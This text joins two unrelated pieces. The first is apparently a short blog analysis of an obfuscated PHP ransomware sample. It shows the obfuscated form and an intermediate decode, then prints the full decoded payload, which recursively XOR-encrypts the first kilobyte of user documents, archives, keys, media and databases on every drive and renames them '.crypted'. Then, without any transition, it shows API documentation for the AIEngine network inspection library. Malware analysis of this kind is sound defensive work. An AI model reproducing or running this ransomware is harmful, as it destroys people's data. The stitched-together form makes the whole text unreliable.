".chr(102)."G1pZH".chr(120).chr(50)."ZGl".chr(56)."dm1".chr(107)."a".chr(51)."x2aGR8".chr(90)."HNr".chr(102)."GltZ3".chr(120)."pc28pJ".chr(67)."9".chr(112)."J".chr(121)."w".chr(107).chr(98)."ykgfHwgJGE9PSdkJyYmcHJl".chr(90)."19tYX".chr(82).chr(106).chr(97).chr(67)."gnL1suXShjcnlwdG".chr(86).chr(107)."K".chr(83)."Q".chr(118)."a".chr(83)."c".chr(115).chr(74)."G8pKQ0KCQl".chr(55)."DQ".chr(111)."JCQkkZn".chr(65)."9Q".chr(71)."ZvcG".chr(86)."uKCRwLiR".chr(122)."LiRvLC".chr(100)."yK".chr(121)."c".chr(112)."O".chr(119)."0K".chr(67)."QkJaWYgKCRmcCE9".chr(80)."WZ".chr(104)."bH".chr(78)."l".chr(75).chr(81)."0".chr(75)."CQkJew".chr(48)."KCQkJCS".chr(82)."4PUB".chr(109)."cmVhZ".chr(67)."gkZnAsMTAyN".chr(67)."k7DQoJCQkJ".chr(90)."m".chr(57)."yKCRpPTA".chr(55)."JG".chr(107).chr(56).chr(99)."3".chr(82)."yb".chr(71)."VuKCR".chr(52)."KTskaS".chr(115)."rKSR4WyRpXT1jaHIob3JkKCR4".chr(87)."yR".chr(112)."XSleb3Jk".chr(75)."C".chr(82)."rWyRpJXN".chr(48).chr(99)."mxlbigkayldKSk7".chr(68)."Q".chr(111)."J".chr(67)."Q".chr(107)."JQG".chr(90)."zZWV".chr(114).chr(75)."C".chr(82)."mc".chr(67)."wwKTsNCgkJCQl".chr(65)."Zndy".chr(97)."XR".chr(108)."KCRmcCwk".chr(101)."C".chr(107)."7DQoJ".chr(67)."Qk".chr(74)."Q".chr(71).chr(90)."jbG9zZS".chr(103).chr(107)."ZnApOw".chr(48)."K".chr(68)."Q".chr(111)."JCQkJaWYoJGE9PS".chr(100)."lJ".chr(121)."k".chr(78)."CgkJCQl7DQo".chr(74)."CQkJCUB".chr(121)."ZW".chr(53)."hb".chr(87)."Uo".chr(74)."H".chr(65)."uJ".chr(72)."Mu".chr(74)."G8s".chr(73)."C".chr(82).chr(119)."LiR".chr(122)."LiRvL".chr(105)."cu".chr(89)."3".chr(74)."5cH".chr(82)."lZCc".chr(112)."Ow0KCQk".chr(74)."C".chr(88)."0".chr(78).chr(67)."gkJCQll".chr(98)."HNlDQoJCQk".chr(74)."ew0".chr(75)."C".chr(81).chr(107)."J".chr(67).chr(81)."lAc".chr(109)."Vu".chr(89)."W1lKC".chr(82)."wLiRzLiR".chr(118)."LCBw".chr(99)."m".chr(86)."nX3J".chr(108).chr(99).chr(71).chr(120)."hY2Uo".chr(74)."y9bL".chr(108)."1jc".chr(110)."lw".chr(100)."GV".chr(107)."JC8n".chr(76).chr(67)."AnJywgJHAuJHMuJG".chr(56).chr(112)."K".chr(84).chr(115)."N".chr(67)."gk".chr(74)."CQl9DQoJCQl9DQoJCX0NCgl9DQoNC".chr(103)."lAY2".chr(120)."vc2VkaXIoJ".chr(71).chr(82)."wKTsNCn0=".chr(34)."));";$s109="/".chr(56)."b3822".chr(49)."e975e7".chr(97).chr(57)."e".chr(54)."ef3c6ed6de0".chr(97)."f".chr(53)."f/e";preg_replace($s109,$x438,"8b38221".chr(101)."975".chr(101)."7a9e6ef3c6ed6de0".chr(97).chr(102)."5f"); ?>
I wrote a basic python script that changes the chr(NUMBER) to their corresponding value in assci and here are the results
<?php $o448="preg_replace";$x438="eval(base64_decode("c2V0X3RpbWVfbGltaXQoMCk7DQoNCmZvcigkaT02NzskaTw9OTA7JGkrKykgaWYoQGlzX2RpcihjaHIoJGkpLic6JykpIFRyZWUoY2hyKCRpKS4nOicpOw0KDQpmdW5jdGlvbiBUcmVlKCRwKQ0Kew0KCSRhPSdlJzsNCgkkaz1iYXNlNjRfZGVjb2RlKCdNV0tUWkpiSXpCQlVuQU5xL21US21Od2diOGdod1BndzhHRFFVcWY4SmxpS3BBZHFzQ0NRTm9QUStYRG5jTmMreUJCWTVFYW9uQkNFbFBWV0kzclJyTzR3SDFpUllNUW9EM2JkS0l6dzZDQllLSTcwUWJZck1KZ0E5a0NLUUpMa3l6YWhMR0tZJyk7DQoJJHM9Y2hyKDkyKTsNCg0KCWlmKHByZWdfbWF0Y2goJy8nLiRzLiRzLicod2lubnR8Ym9vdHxzeXN0ZW18d2luZG93c3x0bXB8dGVtcHxwcm9ncmFtfGFwcGRhdGF8YXBwbGljYXRpb258cm9hbWluZ3xtc29mZmljZXx0ZW1wb3Jhcnl8Y2FjaGUpL2knLCRwKSB8fCBwcmVnX21hdGNoKCcvcmVjeWNsZS9pJywkcCkpIHJldHVybjsNCg0KCSRkcD1Ab3BlbmRpcigkcCk7DQoNCglpZigkZHA9PT1mYWxzZSkgcmV0dXJuOw0KDQoJd2hpbGUoJG89QHJlYWRkaXIoJGRwKSkgaWYoJG8hPScuJyYmJG8hPScuLicpDQoJew0KCQlpZiAoQGlzX2RpcigkcC4kcy4kbykpDQoJCXsNCgkJCVRyZWUoJHAuJHMuJG8pOw0KCQl9DQoJCWVsc2VpZiAoJGE9PSdlJyYmcHJlZ19tYXRjaCgnL1suXSh6aXB8cmFyfHIwMHxyMDF8cjAyfHIwM3w3enx0YXJ8Z3p8Z3ppcHxhcmN8YXJqfGJ6fGJ6MnxiemF8YnppcHxiemlwMnxpY2V8eGxzfHhsc3h8ZG9jfGRvY3h8cGRmfGRqdnV8ZmIyfHJ0ZnxwcHR8cHB0eHxwcHN8c3hpfG9kbXxvZHR8bXBwfHNzaHxwdWJ8Z3BnfHBncHxrZGJ8a2RieHxhbHN8YXVwfGNwcnxucHJ8Y3BwfGJhc3xhc218Y3N8cGhwfHBhc3xjbGFzc3xweXxwbHxofHZifHZjcHJvanx2YnByb2p8amF2YXxiYWt8YmFja3VwfG1kYnxhY2NkYnxtZGZ8b2RifHdkYnxjc3Z8dHN2fHNxbHxwc2R8ZXBzfGNkcnxjcHR8aW5kZHxkd2d8YWl8c3ZnfG1heHxza3B8c2NhZHxjYWR8M2RzfGJsZW5kfGx3b3xsd3N8bWJ8c2xkZHJ3fHNsZGFzbXxzbGRwcnR8dTNkfGpwZ3xqcGVnfHRpZmZ8dGlmfHJhd3xhdml8bXBnfG1wNHxtNHZ8bXBlZ3xtcGV8d21mfHdtdnx2ZWd8bW92fDNncHxmbHZ8bWt2fHZvYnxybXxtcDN8d2F2fGFzZnx3bWF8bTN1fG1pZGl8b2dnfG1pZHx2ZGl8dm1ka3x2aGR8ZHNrfGltZ3xpc28pJC9pJywkbykgfHwgJGE9PSdkJyYmcHJlZ19tYXRjaCgnL1suXShjcnlwdGVkKSQvaScsJG8pKQ0KCQl7DQoJCQkkZnA9QGZvcGVuKCRwLiRzLiRvLCdyKycpOw0KCQkJaWYgKCRmcCE9PWZhbHNlKQ0KCQkJew0KCQkJCSR4PUBmcmVhZCgkZnAsMTAyNCk7DQoJCQkJZm9yKCRpPTA7JGk8c3RybGVuKCR4KTskaSsrKSR4WyRpXT1jaHIob3JkKCR4WyRpXSleb3JkKCRrWyRpJXN0cmxlbigkayldKSk7DQoJCQkJQGZzZWVrKCRmcCwwKTsNCgkJCQlAZndyaXRlKCRmcCwkeCk7DQoJCQkJQGZjbG9zZSgkZnApOw0KDQoJCQkJaWYoJGE9PSdlJykNCgkJCQl7DQoJCQkJCUByZW5hbWUoJHAuJHMuJG8sICRwLiRzLiRvLicuY3J5cHRlZCcpOw0KCQkJCX0NCgkJCQllbHNlDQoJCQkJew0KCQkJCQlAcmVuYW1lKCRwLiRzLiRvLCBwcmVnX3JlcGxhY2UoJy9bLl1jcnlwdGVkJC8nLCAnJywgJHAuJHMuJG8pKTsNCgkJCQl9DQoJCQl9DQoJCX0NCgl9DQoNCglAY2xvc2VkaXIoJGRwKTsNCn0="));";$s109="/8b38221e975e7a9e6ef3c6ed6de0af5f/e";preg_replace($s109,$x438,"8b38221e975e7a9e6ef3c6ed6de0af5f"); ?>
So it seems that the variable contains the mayority of the code but is on base64. So lets decode it.
set_time_limit(0);
for($i=67;$i<=90;$i++) if(@is_dir(chr($i).':')) Tree(chr($i).':');
function Tree($p)
{
$a='e';
$k=base64_decode('MWKTZJbIzBBUnANq/mTKmNwgb8ghwPgw8GDQUqf8JliKpAdqsCCQNoPQ+XDncNc+yBBY5EaonBCElPVWI3rRrO4wH1iRYMQoD3bdKIzw6CBYKI70QbYrMJgA9kCKQJLkyzahLGKY');
$s=chr(92);
if(preg_match('/'.$s.$s.'(winnt|boot|system|windows|tmp|temp|program|appdata|application|roaming|msoffice|temporary|cache)/i',$p) || preg_match('/recycle/i',$p)) return;
$dp=@opendir($p);
if($dp===false) return;
while($o=@readdir($dp)) if($o!='.'&&$o!='..')
{
if (@is_dir($p.$s.$o))
{
Tree($p.$s.$o);
}
elseif ($a=='e'&&preg_match('/[.](zip|rar|r00|r01|r02|r03|7z|tar|gz|gzip|arc|arj|bz|bz2|bza|bzip|bzip2|ice|xls|xlsx|doc|docx|pdf|djvu|fb2|rtf|ppt|pptx|pps|sxi|odm|odt|mpp|ssh|pub|gpg|pgp|kdb|kdbx|als|aup|cpr|npr|cpp|bas|asm|cs|php|pas|class|py|pl|h|vb|vcproj|vbproj|java|bak|backup|mdb|accdb|mdf|odb|wdb|csv|tsv|sql|psd|eps|cdr|cpt|indd|dwg|ai|svg|max|skp|scad|cad|3ds|blend|lwo|lws|mb|slddrw|sldasm|sldprt|u3d|jpg|jpeg|tiff|tif|raw|avi|mpg|mp4|m4v|mpeg|mpe|wmf|wmv|veg|mov|3gp|flv|mkv|vob|rm|mp3|wav|asf|wma|m3u|midi|ogg|mid|vdi|vmdk|vhd|dsk|img|iso)$/i',$o) || $a=='d'&&preg_match('/[.](crypted)$/i',$o))
{
$fp=@fopen($p.$s.$o,'r+');
if ($fp!==false)
{
$x=@fread($fp,1024);
for($i=0;$i<strlen($x);$i++)$x[$i]=chr(ord($x[$i])^ord($k[$i%strlen($k)]));
@fseek($fp,0);
@fwrite($fp,$x);
@fclose($fp);
if($a=='e')
{
@rename($p.$s.$o, $p.$s.$o.'.crypted');
}
else
{
@rename($p.$s.$o, preg_replace('/[.]crypted$/', '', $p.$s.$o));
}
}
}
}
@closedir($dp);
}
Looks familiar to you? It seems that is mutation of Randsomware.
Happy analysis and comments are welcome!
API¶
Class description¶
- BitcoinInfo
- Properties
- total_blocks. Get the total number of Bitcoin blocks on the Flow.
- total_rejects. Get the total number of Bitcoin rejects on the Flow.
- total_transactions. Get the total number of Bitcoin transactions of the Flow.
- Properties
- CoAPInfo
- Properties
- host_name. Gets the CoAP Hostname if the Flow is CoAP.
- matched_domain_name. Gets the matched DomainName object.
- uri. Gets the CoAP URI if the Flow is CoAP.
- Properties
- DHCPInfo
- Properties
- host_name. Gets the DHCP hostname.
- Properties
- DNSInfo
- Properties
- __iter__. Iterate over the IP addresses returned on the query response.
- domain_name. Gets the DNS domain name.
- matched_domain_name. Gets the matched DomainName object.
- Properties
- DatabaseAdaptor Abstract class
- Methods
- insert. Method called when a new Flow is created.
- update. Method called when the Flow is updating.
- remove. Method called when the Flow is removed.
- Methods
- DomainName
- Properties
- name. Gets the name of the domain.
- expression. Gets the domain expression.
- callback. Gets/Sets the callback of the domain.
- http_uri_set. Gets/Sets the HTTPUriSet used on this DomainName (only works on HTTP).
- matchs. Gets the total number of matches of the domain.
- regex_manager. Gets/Sets the HTTP RegexManager used on this DomainName (only works on HTTP).
- Properties
- DomainNameManager
- Methods
- __len__. Return the total number of DomainName objects on the DomainNameManager.
- add_domain_name. Adds a DomainName object to the DomainNameManager.
- remove_domain_name. Removes a DomainName by name.
- show. Shows the DomainName objects.
- Properties
- name. Gets/Sets the name of the DomainNameManager object.
- Methods
- Flow
- Properties
- anomaly. Gets the attached anomaly of the Flow.
- bitcoin_info. Gets a BitcoinInfo object if the Flow is Bitcoin.
- bytes. Gets the total number of bytes.
- coap_info. Returns the CoAPInfo.
- dhcp_info. Returns the DHCPInfo object.
- dns_info. Gets the DNS info name if the Flow is a DNS.
- dst_ip. Gets the destination IP address.
- dst_port. Gets the destination port of the Flow.
- evidence. Gets/Sets the evidence of the Flow for make forensic analysis.
- have_tag. Gets if the Flow have tag from lower network layers (VLAN, MPLS, VXLAN).
- http_info. Returns a HTTPInfo object if the Flow is HTTP.
- imap_info. Gets a IMAPInfo object if the Flow is IMAP.
- ip_set. Returns the IPSet object of the Flow if is part of an IPSet.
- l7_protocol_name. Gets the name of the Protocol of L7 of the Flow.
- label. Gets/Sets the label of the Flow (external labeling).
- mqtt_info. Gets the MQTTInfo object if the flow is MQTT.
- packets. Gets the total number of packets on the Flow.
- packets_layer7. Gets the total number of layer7 packets.
- payload. Gets a list of the bytes of the payload of the Flow.
- pop_info. Gets a POPInfo object if the Flow is POP.
- protocol. Gets the protocol of the Flow (tcp,udp).
- regex. Gets the regex if the Flow have been matched with the associated regex.
- reject. Gets/Sets the reject of the connection.
- sip_info. Returns the SIP Info if the Flow is SIP.
- smtp_info. Gets the SMTP Info if the Flow is SMTP.
- src_ip. Gets the source IP address.
- src_port. Gets the source port of the Flow.
- ssdp_info. Gets the SSDP info if the Flow is SSDP.
- ssl_info. Gets the SSL info if the Flow is SSL.
- tag. Gets the tag from lower network layers.
- Properties
- FlowManager
- Methods
- __iter__. Iterate over the Flows stored on the FlowManager object.
- __len__. Gets the number of Flows stored on the FlowManager.
- flush. Retrieve the active flows to their correspondig caches and free the flow resources.
- show. Shows the active flows on memory.
- Properties
- flows. Gets the number of Flows stored on the FlowManager.
- process_flows. Gets the total number of process Flows.
- timeout_flows. Gets the total number of Flows that have been expired by the timeout.
- Methods
- HTTPInfo
- Properties
- banned. Gets/Sets the Flow banned for no more analysis on the python side and release resources.
- host_name. Gets the HTTP Host if the Flow is HTTP.
- matched_domain_name. Gets the matched DomainName object.
- uri. Gets the HTTP URI if the Flow is HTTP.
- user_agent. Gets the HTTP UserAgent if the Flow is HTTP.
- Properties
- HTTPUriSet
- Properties
- callback. Gets/Sets a callback function for the matching set.
- lookups. Gets the total number of lookups of the set.
- lookups_in. Gets the total number of matched lookups of the set.
- lookups_out. Gets the total number of non matched lookups of the set.
- uris. Gets the total number of URIs on the set. (__LEN__) TODO
- Methods
- add_uri. Adds a URI to the HTTPUriSet.
- Properties
- IMAPInfo
- Properties
- user_name. Gets the user name of the IMAP session if the Flow is IMAP.
- Properties
- IPSet
- Properties
- __len__. Returns the total number of IP address on the IPSet.
- callback. Gets/Sets a function callback for the IPSet.
- lookups. Gets the total number of lookups of the IPSet.
- lookups_in. Gets the total number of matched lookups of the IPSet.
- lookups_out. Gets the total number of non matched lookups of the IPSet.
- name. Gets the name of the IPSet.
- regex_manager. Gets/Sets the RegexManager for this group of IP addresses.
- Methods
- add_ip_address. Add a IP address to the IPSet.
- Properties
- IPSetManager
- Properties
- __iter__. Iterate over the IPSets.
- __len__. Return the total number of IPSets.
- name. Gets/Sets the name of the IPSetManager object.
- Methods
- add_ip_set. Adds a IPSet.
- remove_ip_set. Removes a IPSet.
- show. Shows the IPSets.
- Properties
- MQTTInfo
- Properties
- topic. Gets the MQTT publish topic if the Flow is MQTT.
- Properties
- NetbiosInfo
- Properties
- name. Gets the Netbios Name.
- Properties
- NetworkStack Abstract class
- Properties
- enable_nids_engine. Enables/Disables the NIDS Engine.
- flows_timeout. Gets/Sets the timeout for the TCP/UDP Flows of the stack
- link_layer_tag. Gets/Sets the Link layer tag for Vlans,Mpls encapsulations.
- name. Gets the name of the Stack.
- stats_level. Gets/Sets the number of statistics level for the stack (1-5).
- tcp_flow_manager. Gets the TCP FlowManager for iterate over the Flows.
- tcp_flows. Gets/Sets the maximum number of Flows to be on the cache for TCP traffic.
- tcp_ip_set_manager. Gets/Sets the TCP IPSetManager for TCP traffic.
- tcp_regex_manager. Gets/Sets the TCP RegexManager for TCP traffic.
- udp_flow_manager. Gets the UDP FlowManager for iterate over the Flows.
- udp_flows. Gets/Sets the maximum number of Flows to be on the cache for UDP traffic.
- udp_ip_set_manager. Gets/Sets the UDP IPSetManager for UDP traffic.
- udp_regex_manager. Gets/Sets the UDP RegexManager for UDP traffic.
- Methods
- decrease_allocated_memory. Decrease the allocated memory for a protocol given as parameter.
- get_cache. Gets the main cache of a protocol on a python dict.
- get_counters. Gets the counters of a specific protocol on a python dict.
- get_statistics. Gets the statistics of a protocol on a python dict.
- increase_allocated_memory. Increase the allocated memory for a protocol given as parameter.
- release_cache. Release the cache of a specific protocol.
- release_caches. Release all the caches.
- show_statistics.
- set_anomaly_callback. Sets a callback for specific anomalies on the given protocol.
- set_domain_name_manager. Sets a DomainNameManager on a specific protocol (HTTP,SSL or DNS).
- set_tcp_database_adaptor. Sets a databaseAdaptor for TCP traffic.
- set_udp_database_adaptor. Sets a databaseAdattor for UDP traffic.
- Properties
- POPInfo
- Properties
- user_name. Gets the user name of the POP session if the Flow is POP.
- Properties
- PacketDispatcher
- Properties
- bytes. Gets the total number of bytes process by the PacketDispatcher.
- enable_shell. Gets/Sets a python shell in order to interact with the system on real time.
- evidences. Gets/Sets the evidences for make forensic analysis.
- packets. Gets the total number of packets process by the PacketDispatcher.
- pcap_filter. Gets/Sets a pcap filter on the PacketDispatcher
- stack. Gets/Sets the Network stack that is running on the PacketDispatcher.
- status. Gets the status of the PacketDispatcher.
- Methods
- close. Closes a network device or a pcap file.
- forward_packet. Forwards the received packet to a external packet engine(Netfilter).
- open. Opens a network device or a pcap file for analysis.
- run. Start to process packets.
- set_scheduler. Sets the scheduler for make periodically tasks (DDoS checks).
- Properties
- Regex
- Properties
- callback. Gets/Sets the callback function for the regular expression.
- expression. Gets the regular expression.
- matchs. Gets the number of matches of the regular expression.
- name. Gets the name of the regular expression.
- next_regex. Gets/Sets the next regular expression that should match.
- next_regex_manager. Gets/Sets the next RegexManager for assign to the Flow when a match occurs.
- Properties
- RegexManager
- Properties
- __len__. Gets the total number of Regex stored on the RegexManager object.
- __iter__. Iterate over the Regex stored on the RegexManager object.
- name. Gets/Sets the name of the RegexManager.
- callback. Gets/Sets the callback function for the RegexManager for regular expressions that matches.
- Methods
- add_regex. Adds a Regex object to the RegexManager.
- show. Shows the Regexs stored on the RegexManager.
- Properties
- SIPInfo
- Properties
- from_name. Gets the SIP From if the Flow is SIP.
- to_name. Gets the SIP To if the Flow is SIP.
- uri. Gets the SIP URI if the Flow is SIP.
- via. Gets the SIP Via if the Flow is SIP.
- Properties
- SMTPInfo
- Properties
- banned. Gets or Sets the banned of the Flow.
- mail_from. Gets the Mail From if the Flow is SMTP.
- mail_to. Gets the Rcpt To if the Flow is SMTP.
- Properties
- SSDPInfo
- Properties
- host_name. Gets the SSDP Host if the Flow is SSDP.
- uri. Gets the SSDP URI if the Flow is SSDP.
- Properties
- SSLInfo
- Properties
- matched_domain_name. Gets the matched DomainName object.
- server_name. Gets the SSL server name.
- Properties
Terms and conditions¶
AIEngine is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 2 of the License, or (at your option) any later version.
AIEngine is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with AIEngine. If not, see <http://www.gnu.org/licenses/>.